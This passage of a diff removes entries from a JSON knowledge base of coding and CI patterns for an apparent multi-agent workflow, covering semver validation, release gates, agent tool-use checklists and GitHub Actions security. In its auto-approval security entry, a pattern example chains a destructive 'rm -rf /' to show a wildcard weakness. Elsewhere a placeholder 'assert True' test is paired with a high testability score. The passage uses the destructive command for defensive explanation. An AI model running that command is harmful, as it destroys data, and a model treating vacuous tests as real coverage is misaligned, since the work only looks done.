.tar.gz in dist/\"\n exit 1\n fi\n \n # Gate 4: Quality checks\n - run: pip install dist/*.whl\n - run: python -c \"import map_framework\" # Import test\n \n publish:\n needs: validate # Only run if all gates pass\n runs-on: ubuntu-latest\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "ci-cd", - "release-management", - "validation", - "gates", - "semver", - "quality-assurance", - "fail-fast", - "github-actions" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0027", - "content": "Semver Regex Validation (Spec-Compliant): When validating semantic version format (vX.Y.Z), use Semver 2.0.0 spec-compliant regex that prohibits leading zeros in version components. Pattern: ^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$. The (0|[1-9][0-9]*) construct matches either '0' alone OR non-zero digit followed by any digits, rejecting v01.2.3 or v1.02.3 (spec violations). Simpler patterns like ^v[0-9]+\\.[0-9]+\\.[0-9]+$ accept invalid versions with leading zeros. Pattern proven: GitHub tag v0.01.0 passed simple regex but violated spec, causing package registry rejection. Use spec-compliant regex for validation gates before publishing.", - "code_example": "```bash\n# ❌ INCORRECT - accepts leading zeros (spec violation)\nSIMPLE_SEMVER='^v[0-9]+\\.[0-9]+\\.[0-9]+$'\necho \"v01.2.3\" | grep -qE \"$SIMPLE_SEMVER\" && echo \"Valid\" # Wrongly accepts!\n\n# ✅ CORRECT - Semver 2.0.0 spec-compliant (rejects leading zeros)\nSPEC_SEMVER='^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$'\n\n# Validation function\nvalidate_semver() {\n local tag=\"$1\"\n if [[ ! \"$tag\" =~ $SPEC_SEMVER ]]; then\n echo \"❌ Invalid semver: $tag\"\n echo \"Must match vX.Y.Z with no leading zeros (e.g., v1.2.3, v0.1.0)\"\n echo \"Violations: v01.2.3 (leading zero), v1.02.3 (leading zero)\"\n return 1\n fi\n echo \"✅ Valid semver: $tag\"\n return 0\n}\n\n# Test cases\nvalidate_semver \"v1.2.3\" # ✅ Valid\nvalidate_semver \"v0.1.0\" # ✅ Valid (0 without leading digit OK)\nvalidate_semver \"v01.2.3\" # ❌ Invalid (leading zero)\nvalidate_semver \"v1.02.3\" # ❌ Invalid (leading zero in minor)\n```", - "tags": [ - "semver", - "validation", - "regex", - "versioning", - "bash" - ], - "related_bullets": [ - "impl-0049" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T18:45:00.541231+00:00", - "last_used_at": "2025-10-25T18:45:00.541231+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0028", - "content": "Multi-Gate Validation for Automation Scripts: Before automation scripts modify state (git operations, file edits, package publishing), implement 5 validation gates: (1) Input Format - validate arguments match expected patterns before parsing, (2) Preconditions - check required files/tools exist before processing, (3) Business Logic - verify data meets domain rules (version consistency, no conflicts), (4) Pre-Execution - dry-run or preview changes before applying, (5) Post-Execution - verify expected state reached after modification. Each gate fails fast with actionable error message. Prevents cascading failures where invalid input causes partial state changes that are hard to rollback. Pattern proven: bump_version.sh script prevented broken release by catching version mismatch in gate 3 before git tag creation.", - "code_example": "```bash\n# ❌ INCORRECT - No validation, modifies state blindly\nbump_version.sh() {\n NEW_VERSION=\"$1\"\n sed -i \"s/__version__ = .*/__version__ = '$NEW_VERSION'/\" src/__init__.py\n git commit -am \"Bump version to $NEW_VERSION\"\n git tag \"v$NEW_VERSION\"\n git push --tags\n}\n# Risk: Invalid version format, inconsistent files, broken release\n\n# ✅ CORRECT - 5-gate validation before state changes\nbump_version.sh() {\n NEW_VERSION=\"$1\"\n \n # Gate 1: Input Format Validation\n if [[ ! \"$NEW_VERSION\" =~ ^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$ ]]; then\n echo \"❌ Gate 1 Failed: Invalid semver format '$NEW_VERSION'\"\n exit 1\n fi\n \n # Gate 2: Preconditions Check\n if [[ ! -f \"src/__init__.py\" ]] || [[ ! -f \"pyproject.toml\" ]]; then\n echo \"❌ Gate 2 Failed: Required files missing\"\n exit 1\n fi\n \n # Gate 3: Business Logic Validation\n PYPROJECT_VERSION=$(grep -oP 'version = \"\\K[^\"]+' pyproject.toml)\n if [[ \"$NEW_VERSION\" != \"$PYPROJECT_VERSION\" ]]; then\n echo \"❌ Gate 3 Failed: Version mismatch (input: $NEW_VERSION, pyproject: $PYPROJECT_VERSION)\"\n exit 1\n fi\n \n # Gate 4: Pre-Execution Preview\n echo \"Preview changes:\"\n echo \" - Update src/__init__.py: __version__ = '$NEW_VERSION'\"\n echo \" - Create git tag: v$NEW_VERSION\"\n read -p \"Proceed? (y/N) \" -n 1 -r\n [[ ! $REPLY =~ ^[Yy]$ ]] && exit 0\n \n # Apply changes\n sed -i \"s/__version__ = .*/__version__ = '$NEW_VERSION'/\" src/__init__.py\n git commit -am \"Bump version to $NEW_VERSION\"\n git tag \"v$NEW_VERSION\"\n \n # Gate 5: Post-Execution Verification\n ACTUAL_TAG=$(git describe --tags --exact-match 2>/dev/null)\n if [[ \"$ACTUAL_TAG\" != \"v$NEW_VERSION\" ]]; then\n echo \"❌ Gate 5 Failed: Tag creation failed (expected: v$NEW_VERSION, actual: $ACTUAL_TAG)\"\n exit 1\n fi\n \n echo \"✅ All gates passed. Version bumped to $NEW_VERSION\"\n}\n```", - "tags": [ - "validation", - "automation", - "bash", - "state-changes", - "error-prevention" - ], - "related_bullets": [ - "impl-0049" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T18:45:00.541231+00:00", - "last_used_at": "2025-10-25T18:45:00.541231+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0049", - "content": "Task Description Verb Precision for Tool Selection: When describing file operation subtasks, use precise action verbs (create/update/edit) and explicit file existence state to prevent Actor tool selection failures. Ambiguous verbs like 'add' cause Edit vs Write confusion - 'add entry to CHANGELOG.md' is ambiguous (create new file? modify existing?). Pattern: Ambiguous 'Add CHANGELOG.md entry' → Actor chose Write (creation) instead of Edit (modification) → Monitor detected no actual changes to existing file → Critical failure requiring rework. Use explicit verbs: 'Create new file X' (Write tool), 'Update existing file X with Y' (Edit tool), 'Modify section Z in file X' (Edit tool). This prevents tool selection errors that propagate through workflow.", - "code_example": "```markdown\n# ❌ AMBIGUOUS - causes tool selection failure\nSubtask 5: Add CHANGELOG.md initial release entry\n→ Actor interprets as 'create file' → uses Write tool\n→ File already exists → Write overwrites OR Actor claims creation without actual modification\n→ Monitor detects: git diff shows no changes → CRITICAL failure\n\n# ✅ PRECISE - explicit action and file state\nSubtask 5: Update CHANGELOG.md (existing file) by adding [1.0.0] initial release entry under [Unreleased] section\n→ Actor knows: file exists, needs Edit tool, target section specified\n→ Uses Edit tool with old_string/new_string\n→ Monitor verifies: git diff shows [1.0.0] section added → SUCCESS\n\n# Verb disambiguation guide:\n- \"Create X\" → Write tool (new file)\n- \"Update X with Y\" → Edit tool (modify existing)\n- \"Add entry to X\" → AMBIGUOUS (needs file state)\n- \"Add [1.0.0] section to CHANGELOG.md (existing)\" → Edit tool (explicit state)\n```", - "tags": [ - "task-description", - "tool-selection", - "actor", - "write-edit-confusion", - "map-framework", - "precision" - ], - "related_bullets": [ - "impl-0010", - "impl-0018" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T21:15:57.637760+00:00", - "last_used_at": "2025-10-25T21:15:57.637760+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0048", - "content": "Multi-File Consistency with Cross-Reference Comments: When validation logic (regex patterns, version formats, constraints) exists in multiple files (CI workflow + local script + docs), prevent drift with explicit cross-reference comments linking to source of truth. Format: '# CRITICAL: Must match regex in path/to/file.ext:line_number for consistency'. Prevents bugs where CI validates differently than local script, causing 'works locally, fails in CI' frustration. Update comments when moving logic. Choose single source of truth (usually newest/most comprehensive), reference it from all others.", - "code_example": "```yaml\n# .github/workflows/ci.yml\n- name: Validate version format\n run: |\n # IMPORTANT: Must match regex in scripts/bump-version.sh:139 for consistency\n semver_pattern = r'^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$'\n if not re.match(semver_pattern, version):\n sys.exit(1)\n```\n\n```bash\n# scripts/bump-version.sh:139\nvalidate_semver() {\n # NOTE: CI workflow validates with identical regex (.github/workflows/ci.yml:43)\n if [[ ! \"$version\" =~ ^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$ ]]; then\n die \"Invalid version format: $version\"\n fi\n}\n```", - "tags": [ - "consistency", - "validation", - "synchronization", - "multi-file", - "cross-reference", - "documentation" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0050", - "content": "Actor File Creation Verification Checklist: Actor agents sometimes describe code changes without executing Write/Edit tools, causing 'code in chat but file doesn't exist' failures. Add explicit mandatory checklist to Actor templates: '☐ Did you execute Write for new files? ☐ Did you execute Edit for existing files? ☐ All code persisted to disk (not just in chat)?'. Checklist prevents second occurrence of tool invocation failures observed in 2 separate workflows. Pattern: Actor claims 'Added validate-dependencies.py' → Monitor checks file existence → Not found → CRITICAL failure requiring rework. Complements existing impl-0042 (git diff verification) by adding proactive prevention before Monitor validation. Use structured checklist with checkboxes (not prose) to trigger explicit verification. This enforces tool invocation discipline - descriptions are not substitutes for Edit/Write execution.", - "code_example": "```markdown\n\n## Actor Output Validation (MANDATORY BEFORE SUBMITTING)\n\n- [ ] **File Creation Check**: Did you execute Write tool for ALL new files?\n - [ ] Verify: `ls -la ` returns file, not 'No such file'\n - [ ] NOT SUFFICIENT: Describing code in chat output\n \n- [ ] **File Modification Check**: Did you execute Edit tool for ALL existing files?\n - [ ] Verify: `git diff ` shows your changes\n - [ ] NOT SUFFICIENT: Providing code snippets without Edit invocation\n\n- [ ] **Code Persistence Check**: All code exists on disk (not just in chat)?\n - [ ] Run: `git status` shows new/modified files\n - [ ] CRITICAL: If git status shows nothing, you ONLY described changes\n\n**Error Prevention**: If you checked 'yes' but did NOT invoke Write/Edit tools:\n- Monitor will REJECT with: 'CRITICAL: File not found / Changes NOT applied'\n- You will need to re-execute entire subtask\n- Descriptions in chat do NOT create/modify files\n\n**Example Failure Pattern**:\n❌ Actor output: \"I created validate-dependencies.py with the following code: [code]\"\n❌ No Write tool invocation in action log\n❌ Monitor runs: `test -f validate-dependencies.py` → returns 1 (not found)\n❌ Result: CRITICAL failure, Actor must re-execute\n\n✅ Correct Pattern:\n✅ Actor invokes: Write(file_path=\"validate-dependencies.py\", content=\"...\")\n✅ Actor then describes what was created\n✅ Monitor runs: `test -f validate-dependencies.py` → returns 0 (exists)\n✅ Result: SUCCESS\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "impl-0042", - "impl-0043" - ], - "tags": [ - "actor", - "verification", - "checklist", - "tool-invocation", - "write", - "edit", - "persistence", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0051", - "content": "Test-First Threshold for MAP Actor: Features >100 lines OR new components (classes, modules) MUST include tests in Actor's first iteration. Without tests: testability scores ≤3/10, guarantees Evaluator IMPROVE decision, forces second iteration. Test-to-code ratio target: 2:1 to 3:1 for new features (100 lines production code → 200-300 lines test code). Pattern proven: ASCIIGraphRenderer (284 lines) initially lacked tests → 3/10 testability → second iteration added 400+ lines tests → 9/10 testability. Test-first prevents 'beautiful code, zero testability' anti-pattern where Actor produces working implementation but Evaluator rejects for deployment readiness. Apply test-first threshold based on code size (>100 lines) or structural complexity (new classes/modules), not just feature type. Small utilities (<100 lines, single function) can defer tests, but frameworks/libraries MUST test first.", - "code_example": "```python\n# ❌ ANTI-PATTERN - Actor produces code without tests\nclass ASCIIGraphRenderer:\n def render(self, graph_data: dict) -> str:\n pass # 284 lines\n# Result: testability=3/10, IMPROVE decision\n\n# ✅ GOOD - Actor includes tests first iteration\nclass ASCIIGraphRenderer:\n def render(self, graph_data: dict) -> str:\n pass # 284 lines\n\n# tests/test_ascii_graph_renderer.py (400+ lines)\nclass TestASCIIGraphRenderer:\n def test_simple_graph_rendering(self):\n assert True\n# Result: testability=9/10, APPROVE decision\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "impl-0050", - "arch-0004" - ], - "tags": [ - "MAP", - "Actor", - "testing", - "testability", - "threshold", - "test-first" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0052", - "content": "Aggressive Deprecation Over Code Duplication for Developer Tools: When migrating developer-facing tools from dev scripts (scripts/) to production CLI (src/), replace original with deprecation stub instead of maintaining duplicates. Deprecation stub: print clear migration message, provide new command, exit 1. Rationale: Developer tools can tolerate breaking changes with documentation (unlike end-user apps). Code duplication doubles maintenance burden (746-line scripts/ + 684-line src/ = 2x bug surface). Developers read error messages and adapt workflows. Reserve code duplication for end-user applications where migration friction is unacceptable. Pattern proven: scripts/validate-dependencies.py (746 lines) duplicates src/mapify_cli/tools/validate_dependencies.py (684 lines) - deprecation stub better than maintaining both.", - "code_example": "```python\n# ❌ BAD - Maintain duplicate implementations\n# scripts/validate-dependencies.py (746 lines - DUPLICATE)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Full implementation duplicated from src/\n ...\n\n# src/mapify_cli/tools/validate_dependencies.py (684 lines - ORIGINAL)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Same implementation\n ...\n# Problem: Bug fix requires 2 changes, tests must cover both, 2x maintenance\n\n# ✅ GOOD - Deprecation stub in scripts/\n# scripts/validate-dependencies.py (10 lines - DEPRECATION STUB)\n#!/usr/bin/env python3\n\"\"\"DEPRECATED: This script has moved to the mapify CLI tool.\n\nMigration:\n Old: python scripts/validate-dependencies.py \n New: mapify validate validate-deps \n\nInstall: pip install mapify-cli\nDocs: https://github.com/azalio/map-framework#dependency-validation\n\"\"\"\nimport sys\n\nif __name__ == '__main__':\n print(__doc__, file=sys.stderr)\n print(\"\\nERROR: This script is deprecated. Use 'mapify validate validate-deps' instead.\", file=sys.stderr)\n sys.exit(1)\n\n# src/mapify_cli/tools/validate_dependencies.py (684 lines - SINGLE SOURCE OF TRUTH)\nclass DependencyValidator:\n def validate_imports(self, file_path):\n # Only implementation, no duplicates\n ...\n\n# Update documentation (CONTRIBUTING.md, README.md)\n## Dependency Validation\n**OLD (deprecated):** `python scripts/validate-dependencies.py`\n**NEW:** `mapify validate validate-deps`\n\nThe script in scripts/ is deprecated and will be removed in v2.0.\n\n# Result: 1 implementation (684 lines), 1 stub (10 lines), clear migration path\n# Benefits: Single source of truth, reduced maintenance, forces tool adoption\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "impl-0008", - "arch-0010" - ], - "tags": [ - "deprecation", - "code-duplication", - "migration", - "developer-tools", - "maintenance", - "python", - "breaking-changes" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0054", - "content": "Documentation-Code Signature Validation for CLI Tools: When documenting CLI commands with usage examples, implement CI validation that parses both documentation examples and actual implementation signatures to detect drift. Pattern: (1) Extract CLI examples from markdown (regex: ```bash\\nmapify command --flag=value```), (2) Parse Typer function signatures from implementation (@app.command() decorators, function parameters, type hints), (3) Compare parameter names/types/defaults between docs and code, (4) Fail CI if mismatch detected. Prevents 'documentation rot' where examples become outdated after implementation changes (e.g., docs show validate-dependencies --file=path but implementation expects validate-dependencies file without --file flag). Common drift causes: parameter renames, type changes (str → Path), argument vs option changes. CI validation catches drift before users encounter errors.", - "code_example": "```python\n# ❌ DOCUMENTATION DRIFT (causes user errors)\n# USAGE.md example:\n# ```bash\n# mapify validate-dependencies --file=src/main.py\n# ```\n\n# But implementation signature:\n@app.command('validate-dependencies')\ndef validate_deps(\n file_path: Path = typer.Argument(..., help=\"Python file\") # Argument, not Option!\n):\n pass\n# Result: Users run --file flag, get \"no such option\" error\n\n# ✅ CI VALIDATION (prevents drift)\n# .github/workflows/validate-docs.yml\n- name: Validate CLI examples\n run: |\n python scripts/validate_cli_docs.py\n\n# scripts/validate_cli_docs.py\nimport re, ast, inspect\nfrom mapify_cli.tools.validate_app import app\n\n# Extract from docs\ndoc_examples = re.findall(r'```bash\\n(mapify .*?)\\n```', docs_content)\nfor example in doc_examples:\n cmd, *args = example.split()\n # Parse flags: --file=path → {\"file\": \"path\"}\n doc_params = parse_cli_args(args)\n \n # Extract from implementation\n func = app.registered_commands[cmd]\n sig = inspect.signature(func)\n impl_params = {name: param.annotation for name, param in sig.parameters.items()}\n \n # Compare\n if doc_params.keys() != impl_params.keys():\n raise ValueError(f\"Doc shows {doc_params.keys()}, impl expects {impl_params.keys()}\")\n\n# Result: CI fails on parameter mismatch, forces docs update\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847674Z", - "last_used_at": "2025-10-27T17:45:10.847683Z", - "related_bullets": [ - "impl-0046", - "impl-0047", - "arch-0014" - ], - "tags": [ - "documentation", - "cli", - "validation", - "ci", - "typer", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-workflow-risk", - "content": "MAP Workflow Selection by Risk Profile: Match validation intensity to change risk, not task count. Documentation-only changes (markdown, comments, READMEs) → MAP Efficient workflow (skip per-subtask Monitor/Predictor, batch Evaluator/Reflector). Production code (logic, APIs, schemas) → MAP Feature (full validation per subtask). Evidence-based decision: documentation workflow saved 35% tokens (97K vs 150K theoretical) with 0 errors across 7 subtasks. Risk profile determines workflow, not arbitrary 'simple vs complex' heuristic.", - "code_example": "```bash\n# Decision matrix for workflow selection\nif [[ $change_type == \"documentation\" ]] && [[ $touches_code == false ]]; then\n workflow=\"/map-efficient\" # 35% token savings\nelif [[ $change_type == \"production_code\" ]] || [[ $touches_logic == true ]]; then\n workflow=\"/map-feature\" # Full validation\nfi\n```", - "tags": [ - "map-framework", - "workflow-selection", - "risk-management", - "token-optimization" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143908" - }, - { - "id": "impl-atomic-decomposition", - "content": "Atomic Task Decomposition for Zero-Iteration Workflows: Break complex tasks into 7+ atomic subtasks with explicit success criteria (not 2-3 vague phases). Each subtask must have: single responsibility, clear input/output, independently verifiable success metrics (line counts, example counts, verification commands - NOT subjective 'looks good'). Prevents iteration loops by making acceptance criteria binary. Evidence: Sequential Thinking Integration decomposed into 7 atomic subtasks achieved 7/7 completion with 0 iterations vs typical 3-4 iterations for monolithic 'update documentation' task.", - "code_example": "```markdown\n# ❌ VAGUE\nSubtask 1: Update Monitor agent documentation\nSuccess: Documentation improved\n\n# ✅ ATOMIC\nSubtask 1: Add 'When to Use' section to Monitor agent\nOutput: Minimum 8 bullet points\nVerification: grep -c \"^-\" monitor.md (expect ≥8)\n```", - "related_to": [ - "impl-0014", - "impl-0049" - ], - "tags": [ - "task-decomposition", - "workflow-optimization", - "acceptance-criteria", - "zero-iteration" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143919" - }, - { - "id": "impl-actor-format", - "content": "Actor Content Generation Output Format Specification: When invoking Actor for content generation (documentation sections, code snippets, config files), explicitly request literal insertable format in prompt. Specify: 'Generate content for INSERTION at line X. Format: markdown/python/yaml. No summarization. Copy-pasteable.' Prevents Actor from summarizing output ('I added 3 examples...') instead of providing actual content, eliminating extraction step and avoiding format loss. Evidence: 3/3 Actor invocations for Sequential Thinking Integration required zero reformatting.", - "code_example": "```python\n# ❌ VAGUE PROMPT\nprompt = \"Add examples to Monitor agent\"\n# Result: \"I added 8 examples...\"\n\n# ✅ EXPLICIT FORMAT \nprompt = \"\"\"Generate for INSERTION at line 45.\nFormat: Markdown list.\nContent: 8 examples.\nNo explanatory text.\n\"\"\"\n# Result: Actual markdown ready for insertion\n```", - "related_to": [ - "impl-0050", - "impl-0018" - ], - "tags": [ - "actor-agent", - "content-generation", - "prompt-engineering", - "output-format" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143922" - } - ] - }, - "SECURITY_PATTERNS": { - "description": "Security best practices, authentication, authorization, and vulnerability prevention", - "bullets": [ - { - "id": "sec-0001", - "content": "PyPI OIDC Trusted Publishing: Use GitHub's OIDC provider to authenticate to PyPI instead of long-lived API tokens stored in secrets. Configure trusted publisher in PyPI web UI with repository details, then use pypa/gh-action-pypi-publish action with id-token: write permission. OIDC tokens are short-lived (minutes), scoped to specific workflow, and automatically rotated. Eliminates token leakage risk and secret management overhead. Requires one-time PyPI configuration: project name, repository owner, workflow filename.", - "code_example": "```yaml\n# ❌ INSECURE - long-lived token in GitHub secrets\nname: Publish\non: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n with:\n password: ${{ secrets.PYPI_API_TOKEN }} # Leakage risk, manual rotation\n\n# ✅ SECURE - OIDC trusted publishing (no secrets)\nname: Publish\non:\n push:\n tags: ['v*']\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions:\n id-token: write # Required for OIDC\n contents: read # Minimal permissions\n steps:\n - uses: actions/checkout@v4\n - uses: actions/setup-python@v5\n - run: python -m build\n - uses: pypa/gh-action-pypi-publish@release/v1\n # No password/token needed - OIDC automatic\n # PyPI trusts workflow via OIDC provider\n```", - "tags": [ - "security", - "ci-cd", - "github-actions", - "pypi", - "oidc", - "authentication", - "secrets-management", - "token-rotation" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0002", - "content": "GitHub Actions Least-Privilege Permissions: Explicitly set minimal permissions per workflow using top-level permissions key. Never use default permissions (read-write on all scopes). For OIDC publishing: id-token: write + contents: read only. Set permissions at job level for granular control. Default permissions grant unnecessary access that attackers can exploit via compromised dependencies or workflow injection.", - "code_example": "```yaml\n# ❌ INSECURE - uses default permissions (read-write on all scopes)\nname: Publish\non: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n # Default: contents:write, issues:write, pull-requests:write, etc.\n steps:\n - uses: pypa/gh-action-pypi-publish@release/v1\n\n# ✅ SECURE - explicit minimal permissions\nname: Publish\non: [push]\npermissions: # Top-level: deny all by default\n contents: read\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions: # Job-level: grant only what's needed\n id-token: write # For OIDC\n contents: read # For checkout\n steps:\n - uses: actions/checkout@v4\n - uses: pypa/gh-action-pypi-publish@release/v1\n```", - "tags": [ - "security", - "ci-cd", - "github-actions", - "least-privilege", - "permissions", - "access-control", - "oidc" - ], - "related_bullets": [ - "sec-0001" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:19:45.860329+00:00", - "last_used_at": "2025-10-25T13:19:45.860329+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0003", - "content": "Bash Command Auto-Approval Wildcard Security: Use exact matches without trailing wildcards for security-critical patterns. Wildcards create three attack vectors: (1) glob expansion (*.json* matches .json.bak), (2) binary prefix matches (jq* matches jq-exploit binary), (3) command chaining ([ -f file ]* allows arbitrary suffix commands). Fix: Remove all trailing wildcards, use space-delimited tokens (| jq * not | jq*), anchor strings exactly.", - "code_example": "```bash\n# ❌ INSECURE - wildcard patterns allow attacks\nauto_approve:\n - \"cat *.json*\" # Matches cat file.json.bak (unintended)\n - \"| jq*\" # Matches | jq-exploit binary (prefix attack)\n - \"[ -f graph.json ]*\" # Allows [ -f graph.json ] && rm -rf / (chaining)\n\n# ✅ SECURE - exact matches with space delimiters\nauto_approve:\n - \"cat graph.json\" # Exact filename only\n - \"| jq \" # Space after jq prevents binary prefix match\n - \"[ -f graph.json ]\" # No trailing wildcard prevents chaining\n - \"jq '.tasks'\" # Exact command with exact argument\n```", - "tags": [ - "security", - "bash", - "command-injection", - "wildcards", - "auto-approval", - "cli" - ], - "helpful_count": 5, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477528+00:00", - "last_used_at": "2025-10-27T19:38:54.477681+00:00", - "related_bullets": [], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "sec-0004", - "content": "Space-Delimited Binary Safety in Bash Patterns: Add mandatory space after command name in auto-approval patterns to prevent binary prefix attacks. Pattern '| jq*' matches any binary starting with 'jq' (jq-exploit, jqx), while '| jq ' (with space) only matches the jq binary followed by arguments. Bash tokenization splits on whitespace—space after command ensures exact binary match.", - "code_example": "```bash\n# ❌ INSECURE - no space allows binary prefix attacks\nauto_approve:\n - \"| jq*\" # Matches: | jq-exploit, | jqx, | jq_malicious\n - \"| grep*\" # Matches: | grep-backdoor, | grepx\n\n# ✅ SECURE - space enforces exact binary name\nauto_approve:\n - \"| jq \" # Only matches: | jq , not | jq-exploit\n - \"| grep \" # Only matches: | grep , not | grep-backdoor\n - \"git status\" # Space in command ensures exact 'git' binary\n\n# ✅ BEST - combine space delimiter with exact arguments\nauto_approve:\n - \"| jq '.tasks'\" # Exact binary + exact argument\n - \"git diff --cached\" # Exact binary + exact flags\n```", - "tags": [ - "security", - "bash", - "binary-prefix-attack", - "command-injection", - "tokenization", - "auto-approval" - ], - "helpful_count": 5, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477683+00:00", - "last_used_at": "2025-10-27T19:38:54.477684+00:00", - "related_bullets": [ - "sec-0003" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "PERFORMANCE_PATTERNS": { - "description": "Optimization techniques, caching strategies, and performance anti-patterns to avoid", - "bullets": [ - { - "id": "perf-0024", - "content": "Iterative Refinement ROI Optimization: When Evaluator rejects with IMPROVE decision, prioritize improvements by ROI (improvement potential / implementation cost). Calculate ROI for each dimension: testability improvements = highest ROI when missing (7-point gain, low implementation cost), security fixes = medium ROI (moderate gain, high criticality), documentation = lowest ROI for code quality scores (2-point gain, deferred to later subtask). Target 'low-hanging fruit' first to reach 8.0+ approval threshold faster. Pattern proven: Subtask 6 iteration 1 → 2: adding tests (testability 3→9, +6 points) achieved 2.0-point overall score improvement (6.75→8.75, 30% increase) with single iteration. Avoid optimizing dimensions already at 8+ (diminishing returns) or dimensions handled by future subtasks (wasted effort). ROI prioritization reduces iteration count: 2 iterations with ROI focus vs 4+ iterations with unfocused improvements.", - "code_example": "```python\n# ✅ GOOD - ROI Prioritization\nclass ImprovementPlanner:\n def prioritize(self, scores, threshold=8.0):\n improvements = []\n for dim, score in scores.items():\n if score >= threshold:\n continue\n gap = threshold - score\n cost = self.COST[dim] # low/medium/high\n roi = gap / cost\n improvements.append((dim, roi))\n return sorted(improvements, key=lambda x: x[1], reverse=True)\n\n# Example: testability roi=5.0 → highest priority\n# Result: +6 points, overall +2.0 (30% increase), 1 iteration\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0012", - "impl-0087" - ], - "tags": [ - "iterative-refinement", - "ROI", - "optimization", - "Evaluator", - "improvement", - "prioritization" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "perf-docs-optimization", - "content": "Documentation Workflow Token Optimization: For true documentation changes (markdown files, agent templates, README updates - NOT code comments near logic), use MAP Efficient workflow to skip per-subtask Monitor/Predictor validation and batch Evaluator/Reflector/Curator at end. Achieves 35% token savings (97K vs 150K) with 0 error rate for documentation-only changes. CRITICAL: Only apply to documentation changes that don't affect code behavior. Code comments near logic require full validation. Evidence: Sequential Thinking Integration added 782 lines using MAP Efficient, 0 errors, 53K tokens saved.", - "code_example": "```bash\nchanged_files=$(git diff --name-only HEAD)\nif echo \"$changed_files\" | grep -qE '\\.(py|js|go)$'; then\n workflow=\"/map-feature\" # Code changes\nelif echo \"$changed_files\" | grep -qE '\\.(md|\\.claude/)$'; then\n workflow=\"/map-efficient\" # Docs only (35% savings)\nfi\n```", - "related_to": [ - "perf-0024" - ], - "tags": [ - "token-optimization", - "workflow-selection", - "documentation", - "map-framework" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143923" - } - ] - }, - "ERROR_PATTERNS": { - "description": "Common errors, their root causes, and proven solutions", - "bullets": [ - { - "id": "err-0001", - "content": "Educational Error Messages with Contrast Examples: When validation fails, provide educational context with 5+ valid examples AND 5+ invalid examples with explanations. Developers learn by contrast - showing BOTH what works (✅) and what fails (❌) with reasons builds mental models faster than rejection alone. Include: (1) What input was invalid, (2) Expected format specification, (3) Valid examples (✅), (4) Invalid examples with specific reasons (❌ leading zero, ❌ missing component), (5) Actionable fix (which file to update, what format to use). Pattern prevents repeated trial-and-error.", - "code_example": "```python\n# ❌ BAD - rejection without guidance\nif not valid:\n print(\"Invalid version format\")\n sys.exit(1)\n\n# ✅ GOOD - educational with contrast examples\nif not re.match(semver_pattern, version):\n print(f\"\\n❌ ERROR: Invalid version format: {version}\")\n print(\"\\nExpected format: X.Y.Z (Semantic Versioning 2.0.0)\")\n print(\"\\nValid examples:\")\n print(\" ✅ 0.1.0\")\n print(\" ✅ 1.0.0\")\n print(\" ✅ 